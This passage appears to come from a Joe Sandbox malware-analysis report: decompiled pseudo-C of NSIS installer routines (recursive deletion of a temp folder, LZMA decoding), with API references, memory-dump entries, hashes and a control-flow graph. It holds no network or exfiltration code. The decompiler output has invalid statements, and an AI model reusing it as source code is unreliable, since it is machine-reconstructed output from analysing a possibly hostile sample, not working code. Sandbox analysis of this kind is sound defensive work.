                                                                                    					__eflags = _a4;
                                                                                    					if(_a4 == 0) {
                                                                                    						E00405F83(_t68);
                                                                                    					} else {
                                                                                    						lstrcatW(0x425750, L"\\*.*");
                                                                                    					}
                                                                                    					__eflags =  *_t68;
                                                                                    					if( *_t68 != 0) {
                                                                                    						L10:
                                                                                    						lstrcatW(_t68, 0x40a014);
                                                                                    						L11:
                                                                                    						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                    						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
                                                                                    						_t70 = _t38;
                                                                                    						__eflags = _t70 - 0xffffffff;
                                                                                    						if(_t70 == 0xffffffff) {
                                                                                    							L26:
                                                                                    							__eflags = _a4;
                                                                                    							if(_a4 != 0) {
                                                                                    								_t30 = _t66 - 2;
                                                                                    								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                    								__eflags =  *_t30;
                                                                                    							}
                                                                                    							goto L28;
                                                                                    						} else {
                                                                                    							goto L12;
                                                                                    						}
                                                                                    						do {
                                                                                    							L12:
                                                                                    							__eflags = _v604.cFileName - 0x2e;
                                                                                    							if(_v604.cFileName != 0x2e) {
                                                                                    								L16:
                                                                                    								E00406668(_t66,  &(_v604.cFileName));
                                                                                    								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                    								if(__eflags == 0) {
                                                                                    									_t52 = E00405D2C(__eflags, _t68, _v8);
                                                                                    									__eflags = _t52;
                                                                                    									if(_t52 != 0) {
                                                                                    										E004056CA(0xfffffff2, _t68);
                                                                                    									} else {
                                                                                    										__eflags = _v8 - _t52;
                                                                                    										if(_v8 == _t52) {
                                                                                    											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                    										} else {
                                                                                    											E004056CA(0xfffffff1, _t68);
                                                                                    											E00406428(_t67, _t68, 0);
                                                                                    										}
                                                                                    									}
                                                                                    								} else {
                                                                                    									__eflags = (_a8 & 0x00000003) - 3;
                                                                                    									if(__eflags == 0) {
                                                                                    										E00405D74(__eflags, _t68, _a8);
                                                                                    									}
                                                                                    								}
                                                                                    								goto L24;
                                                                                    							}
                                                                                    							__eflags = _v558;
                                                                                    							if(_v558 == 0) {
                                                                                    								goto L24;
                                                                                    							}
                                                                                    							__eflags = _v558 - 0x2e;
                                                                                    							if(_v558 != 0x2e) {
                                                                                    								goto L16;
                                                                                    							}
                                                                                    							__eflags = _v556;
                                                                                    							if(_v556 == 0) {
                                                                                    								goto L24;
                                                                                    							}
                                                                                    							goto L16;
                                                                                    							L24:
                                                                                    							_t55 = FindNextFileW(_t70,  &_v604); // executed
                                                                                    							__eflags = _t55;
                                                                                    						} while (_t55 != 0);
                                                                                    						_t38 = FindClose(_t70); // executed
                                                                                    						goto L26;
                                                                                    					}
                                                                                    					__eflags =  *0x425750 - 0x5c;
                                                                                    					if( *0x425750 != 0x5c) {
                                                                                    						goto L11;
                                                                                    					}
                                                                                    					goto L10;
                                                                                    				} else {
                                                                                    					__eflags = _t38;
                                                                                    					if(_t38 == 0) {
                                                                                    						L28:
                                                                                    						__eflags = _a4;
                                                                                    						if(_a4 == 0) {
                                                                                    							L36:
                                                                                    							return _t38;
                                                                                    						}
                                                                                    						__eflags = _v12;
                                                                                    						if(_v12 != 0) {
                                                                                    							_t38 = E0040699E(_t68);
                                                                                    							__eflags = _t38;
                                                                                    							if(_t38 == 0) {
                                                                                    								goto L36;
                                                                                    							}
                                                                                    							E00405F37(_t68);
                                                                                    							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                                                                    							__eflags = _t38;
                                                                                    							if(_t38 != 0) {
                                                                                    								return E004056CA(0xffffffe5, _t68);
                                                                                    							}
                                                                                    							__eflags = _v8;
                                                                                    							if(_v8 == 0) {
                                                                                    								goto L30;
                                                                                    							}
                                                                                    							E004056CA(0xfffffff1, _t68);
                                                                                    							return E00406428(_t67, _t68, 0);
                                                                                    						}
                                                                                    						L30:
                                                                                    						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                    						return _t38;
                                                                                    					}
                                                                                    					__eflags = _t65 & 0x00000002;
                                                                                    					if((_t65 & 0x00000002) == 0) {
                                                                                    						goto L28;
                                                                                    					}
                                                                                    					goto L5;
                                                                                    				}
                                                                                    			}


















                                                                                    0x00405d7e
                                                                                    0x00405d83
                                                                                    0x00405d8c
                                                                                    0x00405d8f
                                                                                    0x00405d97
                                                                                    0x00405d9a
                                                                                    0x00405d9d
                                                                                    0x00405da5
                                                                                    0x00405da7
                                                                                    0x00405da8
                                                                                    0x00000000
                                                                                    0x00405da8
                                                                                    0x00405db3
                                                                                    0x00405db6
                                                                                    0x00405db6
                                                                                    0x00405db6
                                                                                    0x00405dba
                                                                                    0x00405dcd
                                                                                    0x00405dd4
                                                                                    0x00405dd9
                                                                                    0x00405ddd
                                                                                    0x00405ded
                                                                                    0x00405ddf
                                                                                    0x00405de5
                                                                                    0x00405de5
                                                                                    0x00405df2
                                                                                    0x00405df6
                                                                                    0x00405e02
                                                                                    0x00405e08
                                                                                    0x00405e0d
                                                                                    0x00405e13
                                                                                    0x00405e1e
                                                                                    0x00405e24
                                                                                    0x00405e26
                                                                                    0x00405e29
                                                                                    0x00405ed3
                                                                                    0x00405ed3
                                                                                    0x00405ed7
                                                                                    0x00405ed9
                                                                                    0x00405ed9
                                                                                    0x00405ed9
                                                                                    0x00405ed9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405e2f
                                                                                    0x00405e2f
                                                                                    0x00405e2f
                                                                                    0x00405e37
                                                                                    0x00405e57
                                                                                    0x00405e5f
                                                                                    0x00405e64
                                                                                    0x00405e6b
                                                                                    0x00405e86
                                                                                    0x00405e8b
                                                                                    0x00405e8d
                                                                                    0x00405eb1
                                                                                    0x00405e8f
                                                                                    0x00405e8f
                                                                                    0x00405e92
                                                                                    0x00405ea6
                                                                                    0x00405e94
                                                                                    0x00405e97
                                                                                    0x00405e9f
                                                                                    0x00405e9f
                                                                                    0x00405e92
                                                                                    0x00405e6d
                                                                                    0x00405e73
                                                                                    0x00405e75
                                                                                    0x00405e7b
                                                                                    0x00405e7b
                                                                                    0x00405e75
                                                                                    0x00000000
                                                                                    0x00405e6b
                                                                                    0x00405e39
                                                                                    0x00405e41
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405e43
                                                                                    0x00405e4b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405e4d
                                                                                    0x00405e55
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405eb6
                                                                                    0x00405ebe
                                                                                    0x00405ec4
                                                                                    0x00405ec4
                                                                                    0x00405ecd
                                                                                    0x00000000
                                                                                    0x00405ecd
                                                                                    0x00405df8
                                                                                    0x00405e00
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405dbc
                                                                                    0x00405dbc
                                                                                    0x00405dbe
                                                                                    0x00405ede
                                                                                    0x00405ee0
                                                                                    0x00405ee3
                                                                                    0x00405f34
                                                                                    0x00405f34
                                                                                    0x00405f34
                                                                                    0x00405ee5
                                                                                    0x00405ee8
                                                                                    0x00405ef3
                                                                                    0x00405ef8
                                                                                    0x00405efa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405efd
                                                                                    0x00405f09
                                                                                    0x00405f0e
                                                                                    0x00405f10
                                                                                    0x00000000
                                                                                    0x00405f2b
                                                                                    0x00405f12
                                                                                    0x00405f15
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405f1a
                                                                                    0x00000000
                                                                                    0x00405f21
                                                                                    0x00405eea
                                                                                    0x00405eea
                                                                                    0x00000000
                                                                                    0x00405eea
                                                                                    0x00405dc4
                                                                                    0x00405dc7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405dc7

                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(?,?,7476FAA0,7476F560,00000000), ref: 00405D9D
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg14BE.tmp\*.*,\*.*), ref: 00405DE5
                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsg14BE.tmp\*.*,?,?,7476FAA0,7476F560,00000000), ref: 00405E0E
                                                                                    • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsg14BE.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsg14BE.tmp\*.*,?,?,7476FAA0,7476F560,00000000), ref: 00405E1E
                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                    • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                    • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsg14BE.tmp\*.*$\*.*
                                                                                    • API String ID: 2035342205-1609783829
                                                                                    • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                    • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                    • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                    • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 547 406d5f-406d64 548 406dd5-406df3 547->548 549 406d66-406d95 547->549 550 4073cb-4073e0 548->550 551 406d97-406d9a 549->551 552 406d9c-406da0 549->552 553 4073e2-4073f8 550->553 554 4073fa-407410 550->554 555 406dac-406daf 551->555 556 406da2-406da6 552->556 557 406da8 552->557 558 407413-40741a 553->558 554->558 559 406db1-406dba 555->559 560 406dcd-406dd0 555->560 556->555 557->555 564 407441-40744d 558->564 565 40741c-407420 558->565 561 406dbc 559->561 562 406dbf-406dcb 559->562 563 406fa2-406fc0 560->563 561->562 566 406e35-406e63 562->566 570 406fc2-406fd6 563->570 571 406fd8-406fea 563->571 573 406be3-406bec 564->573 567 407426-40743e 565->567 568 4075cf-4075d9 565->568 574 406e65-406e7d 566->574 575 406e7f-406e99 566->575 567->564 572 4075e5-4075f8 568->572 576 406fed-406ff7 570->576 571->576 580 4075fd-407601 572->580 577 406bf2 573->577 578 4075fa 573->578 579 406e9c-406ea6 574->579 575->579 581 406ff9 576->581 582 406f9a-406fa0 576->582 584 406bf9-406bfd 577->584 585 406d39-406d5a 577->585 586 406c9e-406ca2 577->586 587 406d0e-406d12 577->587 578->580 589 406eac 579->589 590 406e1d-406e23 579->590 598 407581-40758b 581->598 599 406f7f-406f97 581->599 582->563 588 406f3e-406f48 582->588 584->572 591 406c03-406c10 584->591 585->550 600 406ca8-406cc1 586->600 601 40754e-407558 586->601 592 406d18-406d2c 587->592 593 40755d-407567 587->593 594 40758d-407597 588->594 595 406f4e-407117 588->595 606 406e02-406e1a 589->606 607 407569-407573 589->607 596 406ed6-406edc 590->596 597 406e29-406e2f 590->597 591->578 605 406c16-406c5c 591->605 608 406d2f-406d37 592->608 593->572 594->572 595->573 603 406f3a 596->603 604 406ede-406efc 596->604 597->566 597->603 598->572 599->582 610 406cc4-406cc8 600->610 601->572 603->588 611 406f14-406f26 604->611 612 406efe-406f12 604->612 613 406c84-406c86 605->613 614 406c5e-406c62 605->614 606->590 607->572 608->585 608->587 610->586 615 406cca-406cd0 610->615 618 406f29-406f33 611->618 612->618 621 406c94-406c9c 613->621 622 406c88-406c92 613->622 619 406c64-406c67 GlobalFree 614->619 620 406c6d-406c7b GlobalAlloc 614->620 616 406cd2-406cd9 615->616 617 406cfa-406d0c 615->617 623 406ce4-406cf4 GlobalAlloc 616->623 624 406cdb-406cde GlobalFree 616->624 617->608 618->596 625 406f35 618->625 619->620 620->578 626 406c81 620->626 621->610 622->621 622->622 623->578 623->617 624->623 628 407575-40757f 625->628 629 406ebb-406ed3 625->629 626->613 628->572 629->596
                                                                                    C-Code - Quality: 98%
                                                                                    			E00406D5F() {
                                                                                    				unsigned short _t531;
                                                                                    				signed int _t532;
                                                                                    				void _t533;
                                                                                    				void* _t534;
                                                                                    				signed int _t535;
                                                                                    				signed int _t565;
                                                                                    				signed int _t568;
                                                                                    				signed int _t590;
                                                                                    				signed int* _t607;
                                                                                    				void* _t614;
                                                                                    
                                                                                    				L0:
                                                                                    				while(1) {
                                                                                    					L0:
                                                                                    					if( *(_t614 - 0x40) != 0) {
                                                                                    						 *(_t614 - 0x34) = 1;
                                                                                    						 *(_t614 - 0x84) = 7;
                                                                                    						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                    						L132:
                                                                                    						 *(_t614 - 0x54) = _t607;
                                                                                    						L133:
                                                                                    						_t531 =  *_t607;
                                                                                    						_t590 = _t531 & 0x0000ffff;
                                                                                    						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                    						if( *(_t614 - 0xc) >= _t565) {
                                                                                    							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                    							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                    							 *(_t614 - 0x40) = 1;
                                                                                    							_t532 = _t531 - (_t531 >> 5);
                                                                                    							 *_t607 = _t532;
                                                                                    						} else {
                                                                                    							 *(_t614 - 0x10) = _t565;
                                                                                    							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                    							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                    						}
                                                                                    						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                    							L139:
                                                                                    							_t533 =  *(_t614 - 0x84);
                                                                                    							L140:
                                                                                    							 *(_t614 - 0x88) = _t533;
                                                                                    							goto L1;
                                                                                    						} else {
                                                                                    							L137:
                                                                                    							if( *(_t614 - 0x6c) == 0) {
                                                                                    								 *(_t614 - 0x88) = 5;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                    							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                    							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                    							goto L139;
                                                                                    						}
                                                                                    					} else {
                                                                                    						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                    						__esi =  *(__ebp - 0x60);
                                                                                    						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                    						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                    						__ecx =  *(__ebp - 0x3c);
                                                                                    						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                    						__ecx =  *(__ebp - 4);
                                                                                    						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                    						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                    						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    						if( *(__ebp - 0x38) >= 4) {
                                                                                    							if( *(__ebp - 0x38) >= 0xa) {
                                                                                    								_t97 = __ebp - 0x38;
                                                                                    								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                    							} else {
                                                                                    								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                    							}
                                                                                    						} else {
                                                                                    							 *(__ebp - 0x38) = 0;
                                                                                    						}
                                                                                    						if( *(__ebp - 0x34) == __edx) {
                                                                                    							__ebx = 0;
                                                                                    							__ebx = 1;
                                                                                    							L60:
                                                                                    							__eax =  *(__ebp - 0x58);
                                                                                    							__edx = __ebx + __ebx;
                                                                                    							__ecx =  *(__ebp - 0x10);
                                                                                    							__esi = __edx + __eax;
                                                                                    							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    							__ax =  *__esi;
                                                                                    							 *(__ebp - 0x54) = __esi;
                                                                                    							__edi = __ax & 0x0000ffff;
                                                                                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    							if( *(__ebp - 0xc) >= __ecx) {
                                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    								__cx = __ax;
                                                                                    								_t216 = __edx + 1; // 0x1
                                                                                    								__ebx = _t216;
                                                                                    								__cx = __ax >> 5;
                                                                                    								 *__esi = __ax;
                                                                                    							} else {
                                                                                    								 *(__ebp - 0x10) = __ecx;
                                                                                    								0x800 = 0x800 - __edi;
                                                                                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    								__ebx = __ebx + __ebx;
                                                                                    								 *__esi = __cx;
                                                                                    							}
                                                                                    							 *(__ebp - 0x44) = __ebx;
                                                                                    							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    								L59:
                                                                                    								if(__ebx >= 0x100) {
                                                                                    									goto L54;
                                                                                    								}
                                                                                    								goto L60;
                                                                                    							} else {
                                                                                    								L57:
                                                                                    								if( *(__ebp - 0x6c) == 0) {
                                                                                    									 *(__ebp - 0x88) = 0xf;
                                                                                    									goto L170;
                                                                                    								}
                                                                                    								__ecx =  *(__ebp - 0x70);
                                                                                    								__eax =  *(__ebp - 0xc);
                                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    								_t202 = __ebp - 0x70;
                                                                                    								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    								goto L59;
                                                                                    							}
                                                                                    						} else {
                                                                                    							__eax =  *(__ebp - 0x14);
                                                                                    							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    							if(__eax >=  *(__ebp - 0x74)) {
                                                                                    								__eax = __eax +  *(__ebp - 0x74);
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 8);
                                                                                    							__ebx = 0;
                                                                                    							__ebx = 1;
                                                                                    							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                    							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                    							L40:
                                                                                    							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                    							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                    							__ecx =  *(__ebp - 0x58);
                                                                                    							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                    							 *(__ebp - 0x48) = __eax;
                                                                                    							__eax = __eax + 1;
                                                                                    							__eax = __eax << 8;
                                                                                    							__eax = __eax + __ebx;
                                                                                    							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    							__ax =  *__esi;
                                                                                    							 *(__ebp - 0x54) = __esi;
                                                                                    							__edx = __ax & 0x0000ffff;
                                                                                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                    							if( *(__ebp - 0xc) >= __ecx) {
                                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    								__cx = __ax;
                                                                                    								 *(__ebp - 0x40) = 1;
                                                                                    								__cx = __ax >> 5;
                                                                                    								__ebx = __ebx + __ebx + 1;
                                                                                    								 *__esi = __ax;
                                                                                    							} else {
                                                                                    								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                    								 *(__ebp - 0x10) = __ecx;
                                                                                    								0x800 = 0x800 - __edx;
                                                                                    								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                    								__ebx = __ebx + __ebx;
                                                                                    								 *__esi = __cx;
                                                                                    							}
                                                                                    							 *(__ebp - 0x44) = __ebx;
                                                                                    							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    								L38:
                                                                                    								__eax =  *(__ebp - 0x40);
                                                                                    								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                    									while(1) {
                                                                                    										if(__ebx >= 0x100) {
                                                                                    											break;
                                                                                    										}
                                                                                    										__eax =  *(__ebp - 0x58);
                                                                                    										__edx = __ebx + __ebx;
                                                                                    										__ecx =  *(__ebp - 0x10);
                                                                                    										__esi = __edx + __eax;
                                                                                    										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    										__ax =  *__esi;
                                                                                    										 *(__ebp - 0x54) = __esi;
                                                                                    										__edi = __ax & 0x0000ffff;
                                                                                    										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    										if( *(__ebp - 0xc) >= __ecx) {
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    											__cx = __ax;
                                                                                    											_t169 = __edx + 1; // 0x1
                                                                                    											__ebx = _t169;
                                                                                    											__cx = __ax >> 5;
                                                                                    											 *__esi = __ax;
                                                                                    										} else {
                                                                                    											 *(__ebp - 0x10) = __ecx;
                                                                                    											0x800 = 0x800 - __edi;
                                                                                    											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    											__ebx = __ebx + __ebx;
                                                                                    											 *__esi = __cx;
                                                                                    										}
                                                                                    										 *(__ebp - 0x44) = __ebx;
                                                                                    										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                    											L45:
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0xe;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t155 = __ebp - 0x70;
                                                                                    											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    										}
                                                                                    									}
                                                                                    									L53:
                                                                                    									_t172 = __ebp - 0x34;
                                                                                    									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                    									L54:
                                                                                    									__al =  *(__ebp - 0x44);
                                                                                    									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                    									L55:
                                                                                    									if( *(__ebp - 0x64) == 0) {
                                                                                    										 *(__ebp - 0x88) = 0x1a;
                                                                                    										goto L170;
                                                                                    									}
                                                                                    									__ecx =  *(__ebp - 0x68);
                                                                                    									__al =  *(__ebp - 0x5c);
                                                                                    									__edx =  *(__ebp - 8);
                                                                                    									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                    									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                    									 *( *(__ebp - 0x68)) = __al;
                                                                                    									__ecx =  *(__ebp - 0x14);
                                                                                    									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                    									__eax = __ecx + 1;
                                                                                    									__edx = 0;
                                                                                    									_t191 = __eax %  *(__ebp - 0x74);
                                                                                    									__eax = __eax /  *(__ebp - 0x74);
                                                                                    									__edx = _t191;
                                                                                    									L79:
                                                                                    									 *(__ebp - 0x14) = __edx;
                                                                                    									L80:
                                                                                    									 *(__ebp - 0x88) = 2;
                                                                                    									goto L1;
                                                                                    								}
                                                                                    								if(__ebx >= 0x100) {
                                                                                    									goto L53;
                                                                                    								}
                                                                                    								goto L40;
                                                                                    							} else {
                                                                                    								L36:
                                                                                    								if( *(__ebp - 0x6c) == 0) {
                                                                                    									 *(__ebp - 0x88) = 0xd;
                                                                                    									L170:
                                                                                    									_t568 = 0x22;
                                                                                    									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                    									_t535 = 0;
                                                                                    									L172:
                                                                                    									return _t535;
                                                                                    								}
                                                                                    								__ecx =  *(__ebp - 0x70);
                                                                                    								__eax =  *(__ebp - 0xc);
                                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    								_t121 = __ebp - 0x70;
                                                                                    								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    								goto L38;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					L1:
                                                                                    					_t534 =  *(_t614 - 0x88);
                                                                                    					if(_t534 > 0x1c) {
                                                                                    						L171:
                                                                                    						_t535 = _t534 | 0xffffffff;
                                                                                    						goto L172;
                                                                                    					}
                                                                                    					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                    						case 0:
                                                                                    							if( *(_t614 - 0x6c) == 0) {
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                    							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                    							_t534 =  *( *(_t614 - 0x70));
                                                                                    							if(_t534 > 0xe1) {
                                                                                    								goto L171;
                                                                                    							}
                                                                                    							_t538 = _t534 & 0x000000ff;
                                                                                    							_push(0x2d);
                                                                                    							asm("cdq");
                                                                                    							_pop(_t570);
                                                                                    							_push(9);
                                                                                    							_pop(_t571);
                                                                                    							_t610 = _t538 / _t570;
                                                                                    							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                    							asm("cdq");
                                                                                    							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                    							 *(_t614 - 0x3c) = _t605;
                                                                                    							 *(_t614 - 0x1c) = (1 << _t610) - 1;
